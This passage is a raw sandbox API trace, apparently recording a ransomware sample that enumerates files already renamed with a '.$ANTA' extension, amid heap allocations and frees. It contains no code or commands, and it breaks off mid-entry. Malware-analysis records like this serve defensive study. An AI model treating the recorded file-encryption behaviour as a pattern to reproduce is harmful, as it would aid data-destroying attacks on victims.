RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0078.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0078.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0078.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0078.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.573] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0078.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.573] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0078.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0078.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0078.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca340 [0078.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca460 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0078.574] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.574] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0078.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.574] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9274990, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xf9274990, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xf92e93d1, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x6830, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="59kI0eZovuo4vI8.docx.$ANTA", cAlternateFileName="59KI0E~1.$AN")) returned 1 [0078.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0078.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0078.575] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.575] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0078.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0078.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0078.576] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.576] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0078.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0078.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.576] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93675b6, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xf93675b6, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xf94639e3, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x11980, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="AGO5jVFwME.pptx.$ANTA", cAlternateFileName="AGO5JV~1.$AN")) returned 1 [0078.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0078.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0078.576] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0078.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0078.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.577] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0078.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0078.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0078.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0078.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0078.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca370 [0078.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0078.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0078.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0078.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0078.581] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.581] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0078.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.581] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf94e94f4, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xf94e94f4, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xf955bfa5, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x122a0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="aOtbGAAYxtk159gxW.xlsx.$ANTA", cAlternateFileName="AOTBGA~1.$AN")) returned 1 [0078.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0078.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0078.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0078.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0078.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.581] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0078.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.582] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0078.582] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.582] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.582] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf987d165, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xf987d165, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xf98a3390, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x1150, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="CzDg7AgA6_wtvH.ods.$ANTA", cAlternateFileName="CZDG7A~1.$AN")) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0078.583] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.583] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0078.583] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.583] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.583] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bbbd340, ftCreationTime.dwHighDateTime=0x1d5e57e, ftLastAccessTime.dwLowDateTime=0xb7031e40, ftLastAccessTime.dwHighDateTime=0x1d5e0f2, ftLastWriteTime.dwLowDateTime=0xb7031e40, ftLastWriteTime.dwHighDateTime=0x1d5e0f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="D2Y3tG", cAlternateFileName="")) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.584] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.584] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, 